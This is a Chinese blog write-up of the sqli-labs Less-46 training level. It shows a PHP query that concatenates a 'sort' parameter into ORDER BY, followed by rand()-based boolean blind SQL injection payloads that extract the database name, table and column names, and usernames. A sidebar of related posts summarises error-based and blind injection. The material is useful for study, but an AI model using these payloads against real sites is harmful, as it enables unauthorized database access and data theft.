SQL注入 Less46(order by后的注入+rand()布尔盲注)

最新推荐文章于 2024-02-26 22:15:01 发布
最新推荐文章于 2024-02-26 22:15:01 发布
阅读量764 收藏
点赞数 1
分类专栏: SQL注入 文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55675216/article/details/126043570
版权 
$id=$_GET['sort'];
$sql = "SELECT * FROM users ORDER BY $id";

我们的注入点在 order by 后面的参数中,而 order by不同于的我们在 where 后的注入点,不能使用 union 等进行注入

测试是否存在注入点

?sort=1 desc
?sort=1 asc

desc是 descend 降序意思
asc 是 ascend 升序意思

返回结果不同,说明可以注入。可利用 order by 后的一些参数进行注入

关于下面的这部分与解题无关,直接看布尔盲注的部分即可
?sort=right(version(),1)
?sort=left(version(),1)
返回结果都是
在这里插入图片描述
right(version(),1)和left(version(),1)的结果都是数字,
我觉得可能是字符型的数字,所以又试了一下
在这里插入图片描述
不知道是不是会自动进行类型转换啥的

?sort=5
在这里插入图片描述
?sort='5'
在这里插入图片描述

所以,left(version(),1)返回的应该确实是字符型的数字

布尔盲注

select * from users order by rand();
对users表随机进行排序。
rand()返回的是一个0-1的浮点数,order by 后面跟的是列名或列号。
这里其实可以理解成users表中增加了一个rand字段,字段值是随机产生的。根据该rand字段来对users表进行排序。所以就到达了随机排序的效果

更多原理,看这篇
MySQL-17:order by rand()

select * from users order by rand(1);
select * from users order by rand(0);

?sort=rand(1)
在这里插入图片描述

?sort=rand(0)
在这里插入图片描述

?sot=rand(1=1)
在这里插入图片描述

?sort=rand(length(database())=8)

?sort=rand(ascii(substr(database(),1,1))=115)

?sort=rand(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101)

?sort=rand(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i')

?sort=rand(ascii(substr((select username from users limit 0,1), 1,1))=68)

当然这一题可以用时间盲注和报错注入来写的,Less47会用报错注入来写

https://blog.csdn.net/Kevinhanser/article/details/81563461
https://blog.csdn.net/weixin_43901998/article/details/107577630

开心星人
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
m0_54899775的博客
12-28 1097
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
mysql order by布尔盲注
CvtNhso的博客
02-26 354
在MySQL支持使用ORDER BY语句对查询结果集进行排序理,使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。语法格式如下select * from 表名 order by 列名(或者数字) asc;升序(默认升序)select * from 表名 order by 列名(或者数字) desc;降序使用sqli-labs-php7-master环境在第46关查看源码及打开网页源代码color:#FFF;php?
mysql bool盲注_mysql order by基于时间的盲注
weixin_36166558的博客
01-27 108
order by后面的注入,一般先尝试报错注入,无报错的时候可以通过rand(ture)和rand(false)来进行bool型盲注,但是今天遇到完全没有数据回显的(也就是数据库中没有数据)情况,这就比较麻烦了。记录一下sql语句参考文章:https://www.cnblogs.com/babers/p/7397525.htmlhttps://www.cnblogs.com/Vinson404/p...
mysql order by and_关于mysql执行order by 1 and rand(1)的问题?
weixin_32479897的博客
01-18 906
order by后面跟一个逻辑表达式或者一个NOT DETERMINISTIC的rand函数应该没有工程意义,但是作为SQL一部分,在sql关系模型中是有意义的。既然题主问到为什么,那我们就来解释下sql关系模型中的意义。sql关系模型中,order by clause的BNF:ORDER BY expr,order by子句后面可以是任意表达式数据库order by子句,就是先得到一张输出表...
Less 46 (ORDER BY 后的注入)
老司机开代码的博客
08-04 247
文章目录1. 题目分析2. 注入过程2.1 利用rand()实现布尔盲注2.2 时间盲注2.3 双注入 1. 题目分析 先看一下源码中的SQL $id=$_GET['sort']; $sql = "SELECT * FROM users ORDER BY $id"; 需要注意的是,此我们输入的参数应该是?sort=xxx,并且后台没有对这个参数进行过滤。 但是和以往不同的是,我们的注入位置不再是WHERE后面,而是在ORDER BY之后。 目前有2中注入思路: 利用rand()实现布尔盲注 时间盲注
超级SQL注入工具,支持布尔盲注,报错盲注,union注入
03-27
超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
SQL注入(+盲注).txt
10-13
SQL注入(+盲注).txt
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
SQL注入的绕过技巧有很多,下面这篇文章主要给大家介绍了关于SQL注入技巧之显注与盲注中过滤逗号绕过的相关资料,文中通过示例代码介绍的非常详细,需要的朋友们下面随着小编来一起学习学习吧
布尔盲注.py_sql盲注python_
10-03
布尔盲注Boolean-Based Blind Injection)是SQL注入攻击的一种类型,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,...
sqlilab学习打卡|手工注入|Less46-Less65
spring!
04-06 3695
sqlilab学习打卡|手工注入|Less46-Less65
less-46-47-48-49-50-51-52-53
qq_44598397的博客
04-12 658
LESS-46 1、order by的原理为排序,所以通过sort+asc或desc的输出是否相同便可知是否有使用到排序(ASC 代表结果会以由小往大的顺序列出,而 DESC 代表结果会以由大往小的顺序列出。如果两者皆没有被写出的话,那我们就会用 ASC。) 输入?Sort=1 desc 输入:?Sort=1 asc 两者不同说明这里使用了order by 1、报错注入 输入:http://127...
SQL注入order by 注入:联合盲注、报错、堆叠注入
07-16 1120
【SQL-order by注入
SQLi-LABS Less-46到Less-53
m0_64898960的博客
05-11 172
mysql报错注入rand_mysql报错注入总结
weixin_39932300的博客
02-01 268
文章目录[隐藏]报错注入原因及分类原理分析基于主键值重复基于数据类型的不一致最近又深刻的研究了一下mysql的报错注入,发现很多值得记录的东西,于是写了这篇博客做一个总结,目的是为了更深刻的理解报错注入报错注入原因及分类既然是研究报错注入,那我们先要弄明白为什么我们的注入语句会导致数据库报错,报错的原因我自己总结了一下,有以下几点重复数据报错,这里的重复主要有两个方面,其中之一是基于主键的唯一性:...
sql注入进阶-报错注入盲注order by注入、二次注入SQL注入绕过速查表
Love&Share
09-09 1159
SQL注入 手法分类: 联合注入、报错注入布尔盲注、延时注入、多语句查询注入(堆叠注入) 可能存在注入的点: GPC GET POST COOKIE HTTP头(请求报文及其他字段) 基础 mysql、mssql、SQL Server 以及 Oracle等,不同数据库有不同的特性 mysql 注释 #、-- (空格)、–+、/* */、/*! */(内联查询) mysql默认表 元数据数据库:information_schema(mysql5后才有) mysql表:保存了用户密码,h
SQL报错注入(下)
ssslq的博客
03-01 336
floor函数,exp函数
基于count,group by,rand报错的sql注入原理分析
qq_43814486的博客
04-06 904
以经典的floor注入语句为例: and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)
sql注入布尔盲注流程
最新发布
06-28
SQL注入布尔盲注是一种利用SQL注入技术来检测查询结果是否满足某个条件的攻击方法,它通常在应用程序中用于验证用户输入时使用。以下是SQL注入布尔盲注的基本流程: 1. **识别可注入点**:攻击者首先尝试找出页面上可以接收用户输入的地方,如表单、URL参数等,这些地方可能存在SQL查询。 2. **构造基础查询**:创建一个基本的查询语句,通常是检测一个特定值(例如用户是否存在)的存在,通常是一个简单的`SELECT * FROM table WHERE column = 'value'`。 3. **提交测试数据**:在查询中替换'value'为潜在的恶意输入,例如`'1'`或`'1 OR 1=1'`。'1'会返回所有结果,而`'1 OR 1=1'`在大多数情况下会返回所有数据,因为布尔条件为真。 4. **观察响应**:根据服务器返回的结果,判断原始查询条件是否满足。如果服务器返回预期的结果(如所有数据),则说明条件成立;反之,如果返回空结果或异常,则条件不成立。 5. **迭代调整**:根据响应调整恶意输入,例如尝试否定条件(如`'1 OR 1=0'`),直到找到正确的布尔表达式。 6. **解析结果**:利用布尔表达式的真假来推断数据库中的敏感信息,例如是否存在特定记录、字段值等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

开心星人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值